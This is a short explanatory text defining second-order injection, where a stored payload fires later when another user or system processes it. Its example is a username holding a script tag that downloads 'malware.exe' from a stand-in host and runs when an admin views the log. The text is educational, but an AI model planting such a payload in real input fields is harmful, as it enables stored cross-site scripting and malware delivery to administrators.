What is a 2nd order injection attack?
The payload is stored harmlessly first, then fires later when some other component or user processes it.
2nd order injection stores a malicious payload that executes later on a different system or user — so input that looked safe on the way in becomes dangerous on the way back out.
Example:
- Attacker submits username:
<script>$.download("http://bad.com/malware.exe")</script> - System stores this in a log file
- Later, an admin views the log in their browser
- The script executes in admin's context, downloading malware
The payload doesn't affect the original system but targets downstream users/systems.